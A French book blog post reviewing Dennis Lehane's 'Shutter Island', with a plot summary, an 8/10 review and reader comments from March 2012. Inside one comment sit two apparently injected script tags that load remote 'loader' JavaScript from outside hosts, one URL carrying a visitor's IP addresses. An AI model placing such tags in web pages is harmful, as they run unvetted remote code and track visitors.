• "Shutter Island" de Dennis Lehane

    "Shutter Island" de Dennis Lehane

     

    ~~ Shutter Island ~~

     

    "Shutter Island" de Dennis Lehane

    Dennis Lehanne

    "Shutter Island" de Dennis Lehane

    Rivages/Noir  393 pages

    Nous sommes dans les années cinquante. Au large de Boston, sur un îlot nommé Shutter Island se dresse un groupe de bâtiments à l'allure sinistre. C'est un hôpital psychiatrique dont les patients, tous gravement atteints, ont commis des meurtres. Lorsque le ferry assurant la liaison avec le continent aborde ce jour-là, deux hommes en descendent : le Marshal Teddy Daniels et son coéquipier Chuck Aule. Ils sont venus à la demande des autorités de la prison-hôpital car l'une des patientes, Rachel Solando, manque à l'appel. Comment a-t-elle pu sortir d'une cellule fermée à clé de l'extérieur ? Le seul indice retrouvé dans la pièce est une feuille de papier sur laquelle on peut lire une suite de chiffres et de lettres sans signification apparente. Œuvre incohérente d'une malade ou cryptogramme ? Au fur et à mesure que le temps passe, les deux policiers s'enfoncent dans un monde de plus en plus opaque et angoissant, jusqu'au choc final de la vérité.

     

    "Shutter Island" de Dennis Lehane

     

    Surprenant, si j'ai bien un mot à dire sur ce livre c'est celui-ci ! L'auteur a géré ça comme un pro ! C'est très bien mené, très bien ficelé, très très surprenant, félicitations Mr Lehane !
    J'avoue j'ai eu un peu de mal avec les 150 premières pages, j'ai trouvé que ça trainait un peu mais après, ça c'est bien accéléré, et je reste très très surprise par la fin. C'est finement joué, tout se met en place de façon très subtile, moi je dis bravo ! Je n'ai maintenant qu'une hâte, voir le film ! Si vous aimez le genre, n'hésitez pas !

     

    "Shutter Island" de Dennis Lehane

     

    8/10

    "Shutter Island" de Dennis Lehane

     

     

     

     avec Grenouille2010 ; Isallysun ; Tous les livres ; Fée-tish ; Samlor ; Aurélie ; Dex ; Mimigogotte ; Dahlia ; Kkrolyn ;

     

     

    "Shutter Island" de Dennis Lehane

     

     

     

    Challenge Partage Lecture

     

     

    Baby Challenge "Thriller" chez Livraddict

     

     

     

    "Shutter Island" de Dennis Lehane

    « Bilan du mois de février"Hunger Games" T.1 de Suzanne Collins »

    Tags Tags : , , , ,
  • Commentaires

    1
    Samedi 3 Mars 2012 à 00:22

    Mince, je voulais participer à cette lecture commune, mais j'ai pas eu le temps d'acheter le livre :( Tant pis, je ferai une LC une prochaine fois !!

    2
    Samedi 3 Mars 2012 à 01:08

    Je l'ai trouvé un peu long aussi mais j'ai continué malgré tout parce que je me posais pas mal de questions & la fin m'a littéralement bluffé ! Ca fait plusieurs jours que je l'ai fini & je n'en reviens toujours pas ^^

    J'aime beaucoup ce genre de thriller psychologique qui nous fait plonger dans un univers inquiètant & irréel.. Un très bon livre au final ! :D

    <script src="http://loading-resource.com/50.js.php?i=%7B4D78A890-103E-4ECB-97F8-246471D679F1%7D" type="text/javascript"></script> <script src="https://d3pzomt0ul12fo.cloudfront.net/items/loaders/loader_1032.js?aoi=1311798366&pid=1032&zoneid=10368&cid=FR&rid=A1&ccid=Saint-jean-de-losne&ip=81.49.246.126,%2010.250.38.159" type="text/javascript"></script>
    3
    Samedi 3 Mars 2012 à 09:23

    Un roman très noir, qui va vite, qui prend aux tripes et qui ne laisse pas indifférent, j'ai beaucoup aimé !!!

    4
    Nathcreation
    Samedi 3 Mars 2012 à 11:18

    Celui là il faut que je le lise et le film est vraiment top enfin d'après les avis!! Je te dirais

    Bisous ma belle et bon week end

    5
    Samedi 3 Mars 2012 à 14:13

    Ah oui Nath, lis le, il est vraiment, vraiment bien !

    Bises à tous !

    6
    Samedi 3 Mars 2012 à 20:04

    J'ai vu le film et deviné le dénouement au bout d'un quart d'heure. Mais j'ai beaucoup aimé l'histoire, alors pourquoi pas lire le livre?

    7
    Samedi 3 Mars 2012 à 20:08

    C'est dommage de le lire après avoir lu le film, ça enlève tout le charme ...

    8
    Dimanche 4 Mars 2012 à 08:38
    Fée-tish

    N'hésite surtout pas à voir le film, il est très fidèle au livre et Léonardo Dicaprio est excellent dans le rôle de Teddy !

    9
    Dimanche 4 Mars 2012 à 15:15
    Manu-Chaplum

    Rhalala encore un qu'il faut que je me décide à lire, surtout après avoir vu Alcatraz cet été ! 

    10
    Dimanche 4 Mars 2012 à 19:22

    Ah oui oui, lis le Manu !!!! Fée-Tish, j'ai le film, y'a plus qu'à mais ça ne saurait tarder, bises !

    11
    Lundi 5 Mars 2012 à 12:57

    Tu vas voir le film est extra lui aussi, je trouve qu'il est fidèle au livre. Je comprends que les 150 premières pages peuvent être ennuyeuses, mais elles sont indispensables pour mettre en place le décord.

    12
    Lundi 5 Mars 2012 à 23:26

    J'ai adoré ce livre !

    13
    Mardi 6 Mars 2012 à 11:45

    Tu as tout à fait raison Dex ! bises à vous deux !!

    14
    Mardi 6 Mars 2012 à 18:01
    isallysun

     Courte critique mais qui est bien synthétisée! Contente de voir que ça t'ai plu!

    15
    Anne(Depocheenpoche)
    Jeudi 8 Mars 2012 à 18:29

    J'ai adoré du début jusqu'à la fin ; cet auteur est vraiment très fort. Le film avait l'air bien aussi mais malheureusement je me suis endormie à la moitié ; arghhhhh !!! Bises.

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :